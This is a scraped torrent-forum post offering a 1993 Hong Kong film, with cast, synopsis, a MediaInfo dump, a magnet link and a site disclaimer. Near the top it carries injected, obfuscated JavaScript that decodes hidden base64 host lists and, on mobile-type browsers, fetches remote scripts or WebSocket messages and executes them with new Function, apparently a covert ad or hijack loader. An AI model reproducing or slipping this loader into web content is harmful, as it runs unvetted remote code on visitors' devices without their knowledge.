大闹广昌隆[国粤语配音/中文字幕].Finale.in.Blood.1993.1080p.BluRay.x265.10bit.DTS.2Audio 6.00GB

版主小s 18天前 243

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 大闹广昌隆/Finale in Blood
◎片  名 大鬧廣昌隆
◎年  代 1993
◎产  地 中国香港
◎类  别 剧情 / 爱情 / 恐怖
◎语  言 粤语
◎上映日期 1993-11-06(中国香港)
◎豆瓣评分 6.8/10 from 3557 users
◎豆瓣链接 https://movie.douban.com/subject/1305059/
◎片  长 94 分钟
◎导  演 陈果 Fruit Chan
◎编  剧 陈庆嘉 Hing-Ka Chan / 张小娴 Siu-Han Cheung
◎主  演 郑丹瑞 Lawrence Cheng
       吴大维 David Wu
       陶君薇 Ruth Winona Tao
       青山知可子 Chikako Aoyama
       陈果 Fruit Chan
       简佩筠 Pui Kwan Kan
       敖志君 Peter Ngor
       黎彼得 Peter Lai
       萧亮 Robert Siu Leung
       梁家辉 Tony Leung
       
       单立文 Pal Sinn
       古嘉露 Carroll Gordon
       顾美华 Josephine Koo

◎标  签 香港 | 陈果 | 香港电影 | 爱情 | 吴大维 | 1993 | 青山知可子 | 恐怖

◎简  介

  郑明宝(郑丹瑞 饰)是香港某电台播报猪肉价格的DJ,他的朋友陈七本想托他走私药品,没想到郑明宝把事情搞砸,害得他锒铛入狱。郑明宝无意中得到了一把雨伞,并由此结识了冥间女鬼方茵(陶君薇 饰),为此,郑明宝专门做了一档晚间鬼故事的节目,由方茵现身说法,收听率居高不下,连当红DJ蕾莎(顾美华 饰)也对他另眼相看,暗送秋波。
  
  节目中,方茵讲述了自己的一段被负心汉欺骗、惨遭情敌迫害致死的过程。原来,她本是从南洋来香港接管广昌隆饭店的女继承人,偶然见邂逅了警察马光燊(吴大维 饰),并堕入爱河。但是,马光燊其实是个花花公子,几次三番伤害了方茵纯洁的感情。特别是当他的情妇(青山知可子 饰)登堂入室后,更是把伤心欲绝的方茵逼上了绝路……

◎获奖情况

  第13届香港电影金像奖 ?(1994)
  最佳摄影(提名) 钟志文?/?敖志君

  1. ##### MediaInfo ######
  2. General
  3. Unique ID                                : 207189714832668349420379396131020308308 (0x9BDF499FED15BAA776266DEF1ECF7F54)
  4. Complete name                            : [email protected]QDDQ.COM.mkv
  5. Format                                   : Matroska
  6. Format version                           : Version 4
  7. File size                                : 5.99 GiB
  8. Duration                                 : 1 h 34 min
  9. Overall bit rate                         : 9 058 kb/s
  10. Encoded date                             : UTC 2021-09-27 12:02:17
  11. Writing application                      : mkvmerge v59.0.0 ('Shining Star') 64-bit
  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4
  13. Video
  14. ID                                       : 1
  15. Format                                   : HEVC
  16. Format/Info                              : High Efficiency Video Coding
  17. Format profile                           : Main [email protected]@Main
  18. Codec ID                                 : V_MPEGH/ISO/HEVC
  19. Duration                                 : 1 h 34 min
  20. Bit rate                                 : 5 999 kb/s
  21. Width                                    : 1 920 pixels
  22. Height                                   : 1 024 pixels
  23. Display aspect ratio                     : 1.85:1
  24. Frame rate mode                          : Constant
  25. Frame rate                               : 24.000 FPS
  26. Color space                              : YUV
  27. Chroma subsampling                       : 4:2:0
  28. Bit depth                                : 10 bits
  29. Bits/(Pixel*Frame)                       : 0.127
  30. Stream size                              : 3.97 GiB (66%)
  31. Writing library                          : x265 3.4+1-g07e3381df+31:[Windows][GCC 10.1.0][64 bit] Yuuki 10bit+8bit+12bit
  32. Encoding settings                        : rc=crf / crf=16.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.60 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1024 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0
  33. Language                                 : English
  34. Default                                  : Yes
  35. Forced                                   : No
  36. Audio #1
  37. ID                                       : 2
  38. Format                                   : DTS
  39. Format/Info                              : Digital Theater Systems
  40. Codec ID                                 : A_DTS
  41. Duration                                 : 1 h 34 min
  42. Bit rate mode                            : Constant
  43. Bit rate                                 : 1 510 kb/s
  44. Channel(s)                               : 6 channels
  45. Channel layout                           : C L R Ls Rs LFE
  46. Sampling rate                            : 48.0 kHz
  47. Frame rate                               : 93.750 FPS (512 SPF)
  48. Bit depth                                : 24 bits
  49. Compression mode                         : Lossy
  50. Stream size                              : 1 023 MiB (17%)
  51. Title                                    : Cantonese
  52. Language                                 : Chinese
  53. Default                                  : Yes
  54. Forced                                   : No
  55. Audio #2
  56. ID                                       : 3
  57. Format                                   : DTS
  58. Format/Info                              : Digital Theater Systems
  59. Codec ID                                 : A_DTS
  60. Duration                                 : 1 h 34 min
  61. Bit rate mode                            : Constant
  62. Bit rate                                 : 1 510 kb/s
  63. Channel(s)                               : 6 channels
  64. Channel layout                           : C L R Ls Rs LFE
  65. Sampling rate                            : 48.0 kHz
  66. Frame rate                               : 93.750 FPS (512 SPF)
  67. Bit depth                                : 24 bits
  68. Compression mode                         : Lossy
  69. Stream size                              : 1 023 MiB (17%)
  70. Title                                    : Mandarin
  71. Language                                 : Chinese
  72. Default                                  : No
  73. Forced                                   : No
  74. Text #1
  75. ID                                       : 4
  76. Format                                   : PGS
  77. Muxing mode                              : zlib
  78. Codec ID                                 : S_HDMV/PGS
  79. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  80. Duration                                 : 1 h 30 min
  81. Bit rate                                 : 27.6 kb/s
  82. Count of elements                        : 1746
  83. Stream size                              : 18.0 MiB (0%)
  84. Title                                    : cht
  85. Language                                 : Chinese
  86. Default                                  : No
  87. Forced                                   : No
  88. Text #2
  89. ID                                       : 5
  90. Format                                   : PGS
  91. Muxing mode                              : zlib
  92. Codec ID                                 : S_HDMV/PGS
  93. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  94. Duration                                 : 1 h 30 min
  95. Bit rate                                 : 25.6 kb/s
  96. Count of elements                        : 1746
  97. Stream size                              : 16.6 MiB (0%)
  98. Title                                    : chs
  99. Language                                 : Chinese
  100. Default                                  : Yes
  101. Forced                                   : No
  102. Text #3
  103. ID                                       : 6
  104. Format                                   : PGS
  105. Muxing mode                              : zlib
  106. Codec ID                                 : S_HDMV/PGS
  107. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs
  108. Duration                                 : 1 h 30 min
  109. Bit rate                                 : 26.8 kb/s
  110. Count of elements                        : 1743
  111. Stream size                              : 17.4 MiB (0%)
  112. Title                                    : eng
  113. Language                                 : English
  114. Default                                  : No
  115. Forced                                   : No
  116. Menu
  117. 00:00:00.000                             : :第 01 章
  118. 00:07:21.583                             : :第 02 章
  119. 00:13:49.792                             : :第 03 章
  120. 00:22:20.708                             : :第 04 章
  121. 00:31:01.375                             : :第 05 章
  122. 00:45:34.083                             : :第 06 章
  123. 00:51:48.292                             : :第 07 章
  124. 01:02:25.583                             : :第 08 章
  125. 01:07:14.042                             : :第 09 章
  126. 01:14:35.583                             : :第 10 章
  127. 01:20:43.708                             : :第 11 章
  128. 01:26:21.042                             : :第 12 章
复制代码




TAGS 剧情 恐怖 爱情

磁力链:
  • magnet:?xt=urn:btih:5C350DE11C15EFCDCB383243954E5561A736095D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回